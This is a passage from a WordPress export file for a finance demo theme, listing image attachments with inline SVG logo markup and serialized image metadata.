		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 88.4 30.4" style="enable-background:new 0 0 88.4 30.4;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#FFFFFF;}
</style>
<g id="_x34_">
	<path class="st0" d="M21.9,6c1.2,1,2.8,1.5,4.6,1.4c0.6,0,1.2-0.1,1.9-0.2c-1.2-1.9-2.8-3.6-4.8-4.9c-1.9-1.2-3.9-1.9-5.9-2.2   l1.8,2.8C20.1,4,20.9,5.2,21.9,6z M5.5,18.4C6.2,17.2,6.9,16,7,14.7c0.1-1-0.3-2.1-0.7-3.2L6,10.4C5.4,8.9,4.7,7.4,4.1,6   C4,5.8,3.9,5.7,3.9,5.6c0-0.1-0.1-0.1-0.1-0.2c0-0.1-0.1-0.2-0.1-0.2C3.2,5.7,2.8,6.2,2.4,6.8c-3.7,5.8-3,13,1.1,18   c-0.1-1.3,0.1-2.6,0.6-3.8C4.5,20.1,5,19.3,5.5,18.4z M30.1,18.9c0,0-0.1,0-0.1,0c-0.2,0-0.4,0-0.6,0c-0.1,0-0.2,0-0.2,0   c-1.4,0.2-2.6,0.5-3.7,1.1c-1.4,0.9-2.2,2.5-2.1,4.1c0,0.5,0.1,0.9,0.2,1.4c0.1,0.7,0.3,1.4,0.3,2.1c1.7-1.1,3.1-2.6,4.3-4.4   C29,21.9,29.7,20.4,30.1,18.9z M29.3,16.6c0.4-0.1,0.8-0.2,1.2-0.2c0.1-1.5,0-3-0.3-4.5c-0.2,0-0.4,0.1-0.5,0.1   c-0.9,0.2-1.8,0.5-2.7,0.9c-0.5,0.2-1,0.4-1.4,0.5c-1.3,0.4-3.2,0.9-5.1,0.5c-0.7-0.2-1.3-0.4-1.9-0.8c-1.1-0.7-2-1.8-2.5-3   c-0.4-1.1-0.5-2.2-0.6-3.3c0-0.6-0.1-1.1-0.2-1.6c-0.1-0.9-0.4-1.8-0.9-2.7c-0.5-1-1-1.7-1.5-2.3C10.9,0.3,9,1,7.3,2   C7.2,2.4,7,2.7,7,3C6.7,4.8,8,6.6,9,7.8C9.1,8,9.2,8.2,9.4,8.3c1.3,1.5,2.7,3.3,3,5.5c0.3,2.3-0.6,4.3-1.4,6.2   c-0.7,1.5-1.3,2.9-1.3,4.4c0,1.7,0.9,3.5,2.5,5c0.3,0.3,0.7,0.6,1.1,0.9c0.9,0.1,1.8,0.2,2.7,0.1c0.4-0.3,0.8-0.5,1.1-0.9   c0.8-1,1-2.4,1.1-3.8c0-0.2,0-0.4,0-0.6c0.1-1.5,0.1-3,0.8-4.5c0.8-1.7,2.3-3.1,4-3.6c1.3-0.4,2.7-0.4,4.1-0.4l0.1,0   c0.7,0,1.4,0.1,2,0C29.2,16.6,29.3,16.6,29.3,16.6z"></path>
	<g>
		<path class="st0" d="M48.2,15.5v4.9h-2.4v-4.9l-3.8-7.8h2.5l2.4,5.5l2.4-5.5H52L48.2,15.5z"></path>
		<path class="st0" d="M53.5,20.1c-0.6-0.3-1-0.8-1.3-1.4c-0.3-0.6-0.5-1.3-0.5-2.1v-1.5c0-0.8,0.2-1.5,0.5-2.1    c0.3-0.6,0.8-1,1.3-1.3c0.6-0.3,1.3-0.5,2.1-0.5s1.5,0.2,2.1,0.5c0.6,0.3,1,0.8,1.3,1.3c0.3,0.6,0.5,1.3,0.5,2.1v1.5    c0,0.8-0.2,1.5-0.5,2.1c-0.3,0.6-0.8,1-1.3,1.3c-0.6,0.3-1.3,0.5-2.1,0.5S54.1,20.4,53.5,20.1z M56.8,17.8    c0.3-0.3,0.4-0.7,0.4-1.2v-1.5c0-0.5-0.1-0.9-0.4-1.2s-0.6-0.4-1.1-0.4c-0.5,0-0.9,0.1-1.1,0.4c-0.3,0.3-0.4,0.7-0.4,1.2v1.5    c0,0.5,0.1,0.9,0.4,1.2c0.3,0.3,0.6,0.4,1.1,0.4S56.5,18.1,56.8,17.8z"></path>
		<path class="st0" d="M63,20.1c-0.5-0.3-0.8-0.8-1-1.3c-0.2-0.6-0.4-1.3-0.4-2.1v-1.5c0-0.8,0.1-1.6,0.4-2.2s0.6-1.1,1-1.4    s1-0.5,1.7-0.5c0.5,0,0.9,0.1,1.3,0.4c0.4,0.3,0.7,0.7,1,1.2l-0.2,2c0-0.3-0.1-0.6-0.2-0.8s-0.3-0.4-0.5-0.5    c-0.2-0.1-0.4-0.2-0.7-0.2c-0.5,0-0.8,0.2-1.1,0.5c-0.2,0.3-0.4,0.7-0.4,1.3v1.5c0,0.5,0.1,1,0.4,1.3s0.6,0.4,1.1,0.4    c0.3,0,0.5-0.1,0.7-0.2c0.2-0.1,0.4-0.3,0.5-0.5s0.2-0.5,0.2-0.8l0.1,2.1c-0.2,0.5-0.5,0.9-0.9,1.2c-0.4,0.3-0.8,0.4-1.4,0.4    C64,20.6,63.4,20.4,63,20.1z M66.7,7.7h2.4v12.8h-2.4V7.7z"></path>
		<path class="st0" d="M72.7,20.1c-0.5-0.3-0.8-0.8-1-1.3c-0.2-0.6-0.4-1.3-0.4-2.1v-1.5c0-0.8,0.1-1.6,0.4-2.2s0.6-1.1,1-1.4    s1-0.5,1.7-0.5c0.5,0,0.9,0.1,1.3,0.4c0.4,0.3,0.7,0.7,1,1.2l-0.2,2c0-0.3-0.1-0.6-0.2-0.8s-0.3-0.4-0.5-0.5    c-0.2-0.1-0.4-0.2-0.7-0.2c-0.5,0-0.8,0.2-1.1,0.5c-0.2,0.3-0.4,0.7-0.4,1.3v1.5c0,0.5,0.1,1,0.4,1.3s0.6,0.4,1.1,0.4    c0.3,0,0.5-0.1,0.7-0.2c0.2-0.1,0.4-0.3,0.5-0.5s0.2-0.5,0.2-0.8l0.1,2.1c-0.2,0.5-0.5,0.9-0.9,1.2c-0.4,0.3-0.8,0.4-1.4,0.4    C73.7,20.6,73.1,20.4,72.7,20.1z M73.7,24.2c0,0-0.3-0.1-0.9-0.4c-0.6-0.3-1-0.6-1.3-1.1l1.6-1.5c0.2,0.2,0.5,0.4,0.7,0.5    c0.3,0.1,0.6,0.2,0.9,0.2c0.5,0,0.9-0.1,1.2-0.4c0.3-0.3,0.5-0.7,0.5-1.1v-9h2.4v8.9c0,0.8-0.2,1.6-0.5,2.2    c-0.3,0.6-0.8,1.1-1.4,1.4s-1.4,0.5-2.2,0.5C74,24.2,73.7,24.2,73.7,24.2z"></path>
		<path class="st0" d="M80,11.3h2.3l3.1,7.9l-1.5,1.9L80,11.3z M88.4,11.3l-4.1,11.3c-0.2,0.4-0.3,0.7-0.6,1    c-0.2,0.2-0.5,0.4-0.8,0.5c-0.3,0.1-0.7,0.2-1.2,0.2h-0.5v-2.3h0.5c0.3,0,0.5-0.1,0.6-0.2c0.2-0.1,0.3-0.3,0.4-0.6l3.4-9.9H88.4z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>05</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/about-us/attachment/05/</link>
		<pubDate>Tue, 08 Sep 2020 03:54:20 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/05-2.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>514</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 03:54:20]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 03:54:20]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[05]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/05-2.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/05-2.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 143.2 31.3" style="enable-background:new 0 0 143.2 31.3;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#FFFFFF;}
</style>
<g id="_x35_">
	<g>
		<path class="st0" d="M57.2,20.5h-3.1l-0.9-2.8h-4.5l-0.9,2.8h-3.1l4.6-12.6h3.4L57.2,20.5z M52.6,15.6l-1.4-4.2    C51.1,11,51,10.6,51,10.2h-0.1c0,0.4-0.1,0.7-0.2,1.1l-1.4,4.3H52.6z"></path>
		<path class="st0" d="M63.9,20.4c-0.4,0.2-1,0.3-1.9,0.3c-2,0-2.9-1-2.9-3v-4.1h-1.5v-2h1.5V9.6l2.8-0.8v2.7h2v2h-2v3.6    c0,0.9,0.4,1.4,1.1,1.4c0.3,0,0.6-0.1,0.9-0.3V20.4z"></path>
		<path class="st0" d="M69.8,20.8c-1.5,0-2.7-0.4-3.5-1.3s-1.3-2-1.3-3.4c0-1.5,0.4-2.7,1.3-3.5c0.9-0.8,2.1-1.3,3.6-1.3    c1.5,0,2.7,0.4,3.5,1.3c0.8,0.8,1.3,2,1.3,3.3c0,1.5-0.4,2.7-1.3,3.5S71.3,20.8,69.8,20.8z M69.9,13.5c-0.7,0-1.2,0.2-1.5,0.7    s-0.5,1.1-0.5,1.9c0,1.7,0.7,2.6,2.1,2.6c1.3,0,2-0.9,2-2.7C71.9,14.3,71.2,13.5,69.9,13.5z"></path>
		<path class="st0" d="M90.8,20.5H88v-5.1c0-1.3-0.5-2-1.4-2c-0.5,0-0.8,0.2-1.1,0.6S85,14.9,85,15.5v5h-2.8v-5.2    c0-1.3-0.5-1.9-1.4-1.9c-0.5,0-0.9,0.2-1.1,0.6c-0.3,0.4-0.4,0.9-0.4,1.5v5h-2.8v-9h2.8V13h0c0.3-0.5,0.7-0.9,1.2-1.2    c0.5-0.3,1.1-0.5,1.7-0.5c1.3,0,2.1,0.6,2.6,1.7c0.7-1.1,1.7-1.7,3-1.7c2,0,2.9,1.2,2.9,3.6V20.5z"></path>
		<path class="st0" d="M94.4,10.1c-0.5,0-0.9-0.1-1.2-0.4c-0.3-0.3-0.4-0.6-0.4-1c0-0.4,0.1-0.8,0.4-1s0.7-0.4,1.2-0.4    c0.5,0,0.9,0.1,1.2,0.4s0.4,0.6,0.4,1c0,0.4-0.1,0.8-0.4,1S94.9,10.1,94.4,10.1z M95.8,20.5H93v-9h2.8V20.5z"></path>
		<path class="st0" d="M104.9,20.2c-0.6,0.4-1.5,0.5-2.7,0.5c-1.4,0-2.5-0.4-3.4-1.3s-1.3-1.9-1.3-3.2c0-1.5,0.5-2.7,1.4-3.6    s2.1-1.3,3.7-1.3c1.1,0,1.8,0.1,2.3,0.4v2.4c-0.6-0.4-1.2-0.7-1.9-0.7c-0.8,0-1.4,0.2-1.9,0.7c-0.5,0.5-0.7,1.1-0.7,1.9    c0,0.8,0.2,1.4,0.7,1.9s1.1,0.7,1.8,0.7c0.7,0,1.4-0.2,2-0.7V20.2z"></path>
		<path class="st0" d="M111.4,20.1v-2.8c0.5,0.4,1.1,0.7,1.7,1c0.6,0.2,1.2,0.3,1.8,0.3c0.4,0,0.7,0,0.9-0.1    c0.3-0.1,0.5-0.2,0.7-0.3c0.2-0.1,0.3-0.2,0.4-0.4s0.1-0.3,0.1-0.5c0-0.2-0.1-0.5-0.2-0.7s-0.3-0.4-0.6-0.5s-0.5-0.3-0.9-0.5    s-0.7-0.3-1.1-0.5c-1-0.4-1.7-0.9-2.2-1.5c-0.5-0.6-0.7-1.3-0.7-2.1c0-0.7,0.1-1.2,0.4-1.7s0.6-0.9,1.1-1.2c0.5-0.3,1-0.5,1.6-0.7    c0.6-0.1,1.2-0.2,1.9-0.2c0.7,0,1.2,0,1.7,0.1c0.5,0.1,1,0.2,1.4,0.4v2.6c-0.2-0.1-0.4-0.3-0.7-0.4s-0.5-0.2-0.8-0.3    c-0.3-0.1-0.5-0.1-0.8-0.2c-0.3,0-0.5-0.1-0.7-0.1c-0.3,0-0.6,0-0.9,0.1c-0.3,0.1-0.5,0.1-0.7,0.3s-0.3,0.2-0.4,0.4    s-0.1,0.3-0.1,0.5c0,0.2,0.1,0.4,0.2,0.6c0.1,0.2,0.3,0.3,0.5,0.5c0.2,0.1,0.5,0.3,0.7,0.4s0.6,0.3,1,0.4c0.5,0.2,1,0.4,1.4,0.7    c0.4,0.2,0.7,0.5,1,0.8s0.5,0.6,0.7,1c0.2,0.4,0.2,0.8,0.2,1.3c0,0.7-0.1,1.3-0.4,1.8c-0.3,0.5-0.6,0.9-1.1,1.2    c-0.5,0.3-1,0.5-1.6,0.6c-0.6,0.1-1.2,0.2-1.9,0.2c-0.7,0-1.3-0.1-2-0.2C112.4,20.5,111.9,20.3,111.4,20.1z"></path>
		<path class="st0" d="M129.6,20.5h-7.6V7.9h7.3v2.3h-4.4v2.8h4.1v2.3h-4.1v2.9h4.7V20.5z"></path>
		<path class="st0" d="M137,20.8c-1.8,0-3.3-0.6-4.4-1.8c-1.1-1.2-1.7-2.7-1.7-4.6c0-2,0.6-3.6,1.7-4.8s2.7-1.8,4.6-1.8    c1.8,0,3.3,0.6,4.4,1.8c1.1,1.2,1.7,2.7,1.7,4.7c0,2-0.6,3.6-1.7,4.8C140.3,20.2,138.8,20.8,137,20.8z M137.1,10.2    c-1,0-1.8,0.4-2.4,1.1c-0.6,0.7-0.9,1.7-0.9,3c0,1.2,0.3,2.2,0.9,3s1.4,1.1,2.3,1.1c1,0,1.8-0.4,2.3-1.1s0.9-1.7,0.9-2.9    c0-1.3-0.3-2.3-0.8-3S138.1,10.2,137.1,10.2z"></path>
	</g>
	<path class="st0" d="M30.3,16.2c-1.3,0-2.4,1.1-2.4,2.4c0,0.3,0.1,0.7,0.2,1l-5.4,5.4c-0.2-0.1-0.4-0.3-0.6-0.4V9.8   c2.6-0.1,4.6-2.3,4.6-4.9c0-2.7-2.2-4.9-4.9-4.9s-4.9,2.2-4.9,4.9c0,0.7,0.1,1.3,0.4,1.9l-6.8,5.3c-1.1-1.1-2.6-1.7-4.3-1.7   c-3.4,0-6.2,2.8-6.2,6.2c0,3.4,2.8,6.2,6.2,6.2c3.4,0,6.2-2.8,6.2-6.2c0-1.1-0.3-2.1-0.8-3l6.7-5.2c0.5,0.6,1.2,1,2,1.2v14.7   c-1.9,0.1-3.3,1.7-3.3,3.5c0,2,1.6,3.6,3.6,3.6c2,0,3.6-1.6,3.6-3.6c0-0.5-0.1-0.9-0.3-1.3l5.6-5.6c0.3,0.1,0.6,0.2,1,0.2   c1.3,0,2.4-1.1,2.4-2.4C32.7,17.2,31.6,16.2,30.3,16.2z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>06</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/about-us/attachment/06/</link>
		<pubDate>Tue, 08 Sep 2020 03:54:21 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/06-2.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>515</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 03:54:21]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 03:54:21]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[06]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/06-2.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/06-2.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 128 29.8" style="enable-background:new 0 0 128 29.8;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#FFFFFF;}
</style>
<g id="_x36_">
	<path class="st0" d="M12.4,9.9C10.7,8,8.2,7.2,5.8,7.5C5.6,7.9,5.4,8.3,5.2,8.7c1.3,0.3,2.6,0.9,3.6,2c2.5,2.7,2.3,6.9-0.4,9.4   c-0.9,0.9-2.1,1.4-3.2,1.6c0.1,0.2,0.2,0.4,0.3,0.5c2.3,0.5,4.7-0.1,6.5-1.8C15,17.6,15.2,12.9,12.4,9.9z M7.6,17.8   c1.4-1.9,1-4.7-1-6.1c-1.9-1.4-4.7-1-6.1,1C0.3,13,0.1,13.3,0,13.7c0.8-0.8,2-0.9,2.9-0.2c1,0.7,1.2,2.2,0.5,3.2   c-0.7,1-2.2,1.2-3.2,0.5c0,0-0.1,0-0.1-0.1c0.3,0.6,0.8,1.2,1.4,1.6C3.5,20.2,6.2,19.7,7.6,17.8z M20.7,7c-3.1-3.4-7.8-4.5-12-3.3   C8.6,3.8,8.6,3.9,8.5,3.9C7.9,4.5,7.3,5.1,6.9,5.7c2.7-0.2,5.5,0.7,7.5,2.9c3.4,3.7,3.1,9.4-0.6,12.8c-2,1.9-4.7,2.6-7.2,2.3   c0.3,0.4,0.6,0.8,1,1.2c0.3,0.4,0.7,0.7,1,1c3.8,1.2,8.2,0.4,11.4-2.5C24.7,19.1,25.1,11.8,20.7,7z M11.6,1.7   c4.1-0.5,8.5,0.9,11.5,4.2c5,5.4,4.6,13.8-0.8,18.8c-3,2.7-6.8,3.8-10.6,3.4c5.4,2.8,12.2,2.1,16.9-2.2c6.1-5.6,6.5-15,0.9-21.1   C24.9-0.3,17.5-1.4,11.6,1.7z"></path>
	<g>
		<path class="st0" d="M46.9,7.2h5.6c1.2,0,2.1,0.3,2.9,0.9c0.7,0.6,1.1,1.4,1.1,2.4c0,0.6-0.2,1.2-0.5,1.7    c-0.4,0.5-0.9,0.9-1.5,1.1c0.7,0.2,1.3,0.6,1.8,1.1c0.4,0.5,0.7,1.1,0.7,1.9c0,1-0.4,1.9-1.2,2.5c-0.8,0.6-1.8,1-3,1h-5.9V7.2z     M52.3,9h-3.2v3.5h3.2c0.6,0,1.1-0.2,1.5-0.5c0.4-0.3,0.6-0.7,0.6-1.3s-0.2-1-0.6-1.3C53.4,9.1,52.9,9,52.3,9z M52.5,18    c0.7,0,1.2-0.2,1.6-0.5c0.4-0.4,0.6-0.8,0.6-1.4s-0.2-1.1-0.6-1.4c-0.4-0.3-0.9-0.5-1.6-0.5h-3.4V18H52.5z"></path>
		<path class="st0" d="M58.8,15.3c0-0.7,0.1-1.3,0.4-1.8c0.2-0.6,0.6-1.1,1-1.5c0.4-0.4,0.9-0.7,1.4-1c0.6-0.2,1.2-0.4,1.8-0.4    c0.6,0,1.2,0.1,1.8,0.4s1,0.6,1.4,1s0.7,0.9,1,1.5c0.2,0.6,0.3,1.2,0.3,1.8s-0.1,1.3-0.4,1.9c-0.2,0.6-0.6,1.1-1,1.5    c-0.4,0.4-0.9,0.7-1.4,1C64.6,19.9,64,20,63.3,20s-1.2-0.1-1.8-0.4c-0.6-0.2-1-0.6-1.4-1c-0.4-0.4-0.7-0.9-1-1.5    C58.9,16.6,58.8,16,58.8,15.3z M63.3,18.2c0.7,0,1.3-0.3,1.8-0.8c0.5-0.6,0.7-1.2,0.7-2.1c0-0.9-0.2-1.6-0.7-2.1    c-0.5-0.6-1.1-0.8-1.8-0.8c-0.7,0-1.3,0.3-1.8,0.8c-0.5,0.6-0.7,1.3-0.7,2.1c0,0.8,0.2,1.5,0.7,2.1C62,18,62.6,18.2,63.3,18.2z"></path>
		<path class="st0" d="M69.6,15.3c0-0.7,0.1-1.3,0.4-1.8c0.2-0.6,0.6-1.1,1-1.5c0.4-0.4,0.9-0.7,1.4-1c0.6-0.2,1.2-0.4,1.8-0.4    c0.6,0,1.2,0.1,1.8,0.4s1,0.6,1.4,1s0.7,0.9,1,1.5c0.2,0.6,0.3,1.2,0.3,1.8s-0.1,1.3-0.4,1.9c-0.2,0.6-0.6,1.1-1,1.5    c-0.4,0.4-0.9,0.7-1.4,1c-0.6,0.2-1.2,0.4-1.8,0.4s-1.2-0.1-1.8-0.4c-0.6-0.2-1-0.6-1.4-1c-0.4-0.4-0.7-0.9-1-1.5    C69.7,16.6,69.6,16,69.6,15.3z M74.2,18.2c0.7,0,1.3-0.3,1.8-0.8c0.5-0.6,0.7-1.2,0.7-2.1c0-0.9-0.2-1.6-0.7-2.1    c-0.5-0.6-1.1-0.8-1.8-0.8c-0.7,0-1.3,0.3-1.8,0.8c-0.5,0.6-0.7,1.3-0.7,2.1c0,0.8,0.2,1.5,0.7,2.1C72.8,18,73.4,18.2,74.2,18.2z"></path>
		<path class="st0" d="M80,18.8l1-1.4c0.6,0.4,1.1,0.6,1.5,0.8c0.4,0.2,0.9,0.2,1.3,0.2c0.5,0,1-0.1,1.3-0.3s0.5-0.5,0.5-0.9    c0-0.3-0.1-0.5-0.3-0.7s-0.5-0.3-0.9-0.4l-1.6-0.3c-0.9-0.2-1.5-0.4-2-0.9c-0.4-0.4-0.7-1-0.7-1.6c0-0.8,0.3-1.5,1-2    c0.6-0.5,1.5-0.8,2.5-0.8c0.6,0,1.2,0.1,1.8,0.3c0.6,0.2,1.2,0.4,1.7,0.8l-1,1.3c-0.5-0.3-0.9-0.5-1.4-0.7    c-0.4-0.1-0.9-0.2-1.3-0.2c-0.5,0-0.8,0.1-1.1,0.3c-0.3,0.2-0.4,0.4-0.4,0.8c0,0.3,0.1,0.5,0.3,0.6c0.2,0.1,0.5,0.3,1,0.3l1.6,0.3    c0.9,0.2,1.6,0.5,2,0.9c0.4,0.4,0.7,1,0.7,1.6c0,0.4-0.1,0.8-0.3,1.2c-0.2,0.4-0.4,0.7-0.8,0.9s-0.7,0.5-1.2,0.6    c-0.5,0.1-0.9,0.2-1.4,0.2c-0.8,0-1.5-0.1-2.2-0.3S80.5,19.2,80,18.8z"></path>
		<path class="st0" d="M90.4,17.4v-5h-1.8v-1.6h1.8V8.3l2-0.4v2.9h2.5v1.6h-2.5V17c0,0.4,0.1,0.8,0.3,0.9c0.2,0.2,0.5,0.3,1,0.3    c0.2,0,0.4,0,0.6,0c0.2,0,0.4-0.1,0.7-0.2v1.7c-0.3,0.1-0.6,0.1-0.9,0.2c-0.3,0-0.6,0.1-0.9,0.1c-0.9,0-1.6-0.2-2.1-0.6    S90.4,18.3,90.4,17.4z"></path>
		<path class="st0" d="M104.3,18.7c-0.6,0.5-1.1,0.8-1.7,1c-0.6,0.2-1.2,0.3-1.9,0.3c-0.6,0-1.2-0.1-1.8-0.4c-0.6-0.2-1-0.6-1.5-1    s-0.7-0.9-1-1.5s-0.4-1.2-0.4-1.8c0-0.7,0.1-1.3,0.3-1.8c0.2-0.6,0.5-1.1,0.9-1.5s0.9-0.7,1.4-1s1.1-0.4,1.7-0.4    c0.6,0,1.2,0.1,1.7,0.4c0.5,0.2,1,0.6,1.3,1s0.7,0.9,0.9,1.5c0.2,0.6,0.3,1.2,0.3,1.9v0.5h-6.7c0.1,0.7,0.4,1.3,0.9,1.8    s1.1,0.7,1.8,0.7c0.4,0,0.8-0.1,1.2-0.2c0.4-0.1,0.7-0.4,0.9-0.6L104.3,18.7z M100.5,12.3c-0.6,0-1.1,0.2-1.5,0.6    c-0.4,0.4-0.7,1-0.8,1.6h4.7c-0.1-0.7-0.4-1.2-0.8-1.6S101.1,12.3,100.5,12.3z"></path>
		<path class="st0" d="M106.9,19.8v-9h2v2c0.2-0.7,0.6-1.2,1-1.6s0.9-0.5,1.5-0.5c0.2,0,0.3,0,0.4,0.1c0.1,0,0.3,0.1,0.4,0.1v1.8    c-0.2-0.1-0.3-0.1-0.5-0.2s-0.4-0.1-0.6-0.1c-0.5,0-0.9,0.1-1.3,0.4c-0.4,0.3-0.7,0.6-0.9,1.1v5.9H106.9z"></path>
		<path class="st0" d="M115,9c-0.3,0-0.6-0.1-0.9-0.4s-0.4-0.5-0.4-0.9c0-0.3,0.1-0.6,0.4-0.9c0.3-0.3,0.5-0.4,0.9-0.4    c0.3,0,0.6,0.1,0.9,0.4c0.3,0.3,0.4,0.5,0.4,0.9c0,0.3-0.1,0.6-0.4,0.9S115.3,9,115,9z M116,10.8v9h-2v-9H116z"></path>
		<path class="st0" d="M118.1,15.3c0-0.7,0.1-1.3,0.4-1.8c0.2-0.6,0.6-1.1,1-1.5c0.4-0.4,0.9-0.7,1.4-1c0.6-0.2,1.2-0.4,1.8-0.4    c0.6,0,1.2,0.1,1.8,0.4s1,0.6,1.4,1s0.7,0.9,1,1.5c0.2,0.6,0.3,1.2,0.3,1.8s-0.1,1.3-0.4,1.9c-0.2,0.6-0.6,1.1-1,1.5    c-0.4,0.4-0.9,0.7-1.4,1c-0.6,0.2-1.2,0.4-1.8,0.4s-1.2-0.1-1.8-0.4c-0.6-0.2-1-0.6-1.4-1c-0.4-0.4-0.7-0.9-1-1.5    C118.2,16.6,118.1,16,118.1,15.3z M122.6,18.2c0.7,0,1.3-0.3,1.8-0.8c0.5-0.6,0.7-1.2,0.7-2.1c0-0.9-0.2-1.6-0.7-2.1    c-0.5-0.6-1.1-0.8-1.8-0.8c-0.7,0-1.3,0.3-1.8,0.8c-0.5,0.6-0.7,1.3-0.7,2.1c0,0.8,0.2,1.5,0.7,2.1    C121.3,18,121.9,18.2,122.6,18.2z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>testi2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/about-us/testi2/</link>
		<pubDate>Tue, 08 Sep 2020 04:12:51 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/testi2.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>518</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 04:12:51]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 04:12:51]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[testi2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/testi2.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/testi2.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:90;s:6:"height";i:90;s:4:"file";s:20:"2020/09/testi2.png";s:5:"sizes";a:0:{}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>testi3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/about-us/testi3/</link>
		<pubDate>Tue, 08 Sep 2020 04:12:53 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/testi3.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>519</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 04:12:53]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 04:12:53]]></wp:post_date_gmt>
